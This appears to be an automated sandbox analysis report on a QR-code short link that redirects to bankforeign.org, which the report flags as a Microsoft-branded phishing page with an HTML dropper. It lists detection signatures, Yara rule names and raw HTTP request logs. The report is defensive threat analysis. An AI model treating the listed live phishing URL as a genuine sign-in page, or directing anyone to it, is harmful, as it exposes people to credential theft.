Edit tour

Windows Analysis Report
https://qrco.de/belJ9F

Overview

General Information

Sample URL:https://qrco.de/belJ9F
Analysis ID:1385181
Infos:

Detection

HtmlDropper, HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Phishing site detected (based on shot match)
Yara detected Html Dropper
Yara detected HtmlPhish10
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Creates files inside the system directory
HTML body contains low number of good links
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid 'sign-in options' or 'sign-up' link found

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 6108 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2628 --field-trial-handle=2440,i,8409755720781432192,11699646399889136844,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6504 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://qrco.de/belJ9F MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
2.6.pages.csvJoeSecurity_HtmlDropper_3Yara detected Html DropperJoe Security
    2.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      3.7.pages.csvJoeSecurity_HtmlDropper_3Yara detected Html DropperJoe Security
        3.7.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          Phishing

          barindex
          Source: https://bankforeign.org/Matcher: Template: genphish matched
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normalMatcher: Template: genphish matched
          Source: Yara matchFile source: 2.6.pages.csv, type: HTML
          Source: Yara matchFile source: 3.7.pages.csv, type: HTML
          Source: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1Matcher: Found strong image similarity, brand: MICROSOFT
          Source: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1Matcher: Template: microsoft matched
          Source: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1#Matcher: Template: microsoft matched
          Source: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1HTTP Parser: Number of links: 0
          Source: https://bankforeign.org/HTTP Parser: Base64 decoded: https://bankforeign.org/
          Source: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1HTTP Parser: Title: 453fa232abc4214e3761f2e341440bc065bc0151070aa does not match URL
          Source: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1HTTP Parser: Invalid link: get a new Microsoft account
          Source: https://bankforeign.org/HTTP Parser: No favicon
          Source: https://bankforeign.org/HTTP Parser: No favicon
          Source: https://bankforeign.org/HTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normalHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normalHTTP Parser: No favicon
          Source: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1HTTP Parser: No favicon
          Source: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1HTTP Parser: No <meta name="author".. found
          Source: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1HTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 23.36.68.63:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.36.68.63:443 -> 192.168.2.4:49747 version: TLS 1.2
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownTCP traffic detected without corresponding DNS query: 23.36.68.63
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /belJ9F HTTP/1.1Host: qrco.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bankforeign.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=84ecff1778c36766 HTTP/1.1Host: bankforeign.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bankforeign.org/?__cf_chl_rt_tk=VHN6UJvCYOWIaoKHF0o4f0lISfiWLmR.K9wFt6RmMjc-1706819889-0-gaNycGzNEFAAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bankforeign.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bankforeign.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/24864818/api.js?onload=rmxH0&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bankforeign.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/461457:1706818037:TP9mi9T_s6X4VHjzA43SctCQXweCPTtEqjXfreTTO6Q/84ecff1778c36766/f5b0b7c7d91ebf9 HTTP/1.1Host: bankforeign.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=84ecff284c9c7bd8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bankforeign.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bankforeign.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1724395763:1706818044:48Oktt0s5MTU6dFdGgTX_IFhJzDfI-CAztyQWs6jl5M/84ecff284c9c7bd8/40a43fe0ff648d1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/84ecff284c9c7bd8/1706819895334/ZNRieHZtFjh53PU HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/84ecff284c9c7bd8/1706819895334/ZNRieHZtFjh53PU HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/84ecff284c9c7bd8/1706819895338/b81ae8d2fdf28c1e7dd5c58790b5061860f582aa9f45611c56e54c4cbacce485/lRi2J-abNJ11Sqg HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1724395763:1706818044:48Oktt0s5MTU6dFdGgTX_IFhJzDfI-CAztyQWs6jl5M/84ecff284c9c7bd8/40a43fe0ff648d1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1724395763:1706818044:48Oktt0s5MTU6dFdGgTX_IFhJzDfI-CAztyQWs6jl5M/84ecff284c9c7bd8/40a43fe0ff648d1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bankforeign.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bankforeign.org/?__cf_chl_tk=VHN6UJvCYOWIaoKHF0o4f0lISfiWLmR.K9wFt6RmMjc-1706819889-0-gaNycGzNEFAAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/461457:1706818037:TP9mi9T_s6X4VHjzA43SctCQXweCPTtEqjXfreTTO6Q/84ecff1778c36766/f5b0b7c7d91ebf9 HTTP/1.1Host: bankforeign.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1 HTTP/1.1Host: bankforeign.orgConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Referer: https://bankforeign.org/?__cf_chl_tk=VHN6UJvCYOWIaoKHF0o4f0lISfiWLmR.K9wFt6RmMjc-1706819889-0-gaNycGzNEFAAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
          Source: global trafficHTTP traffic detected: GET /jq/a8fa5b4494ce08322db1f933d9e75f5e65bc015265adc HTTP/1.1Host: bankforeign.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
          Source: global trafficHTTP traffic detected: GET /boot/a8fa5b4494ce08322db1f933d9e75f5e65bc015265ade HTTP/1.1Host: bankforeign.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
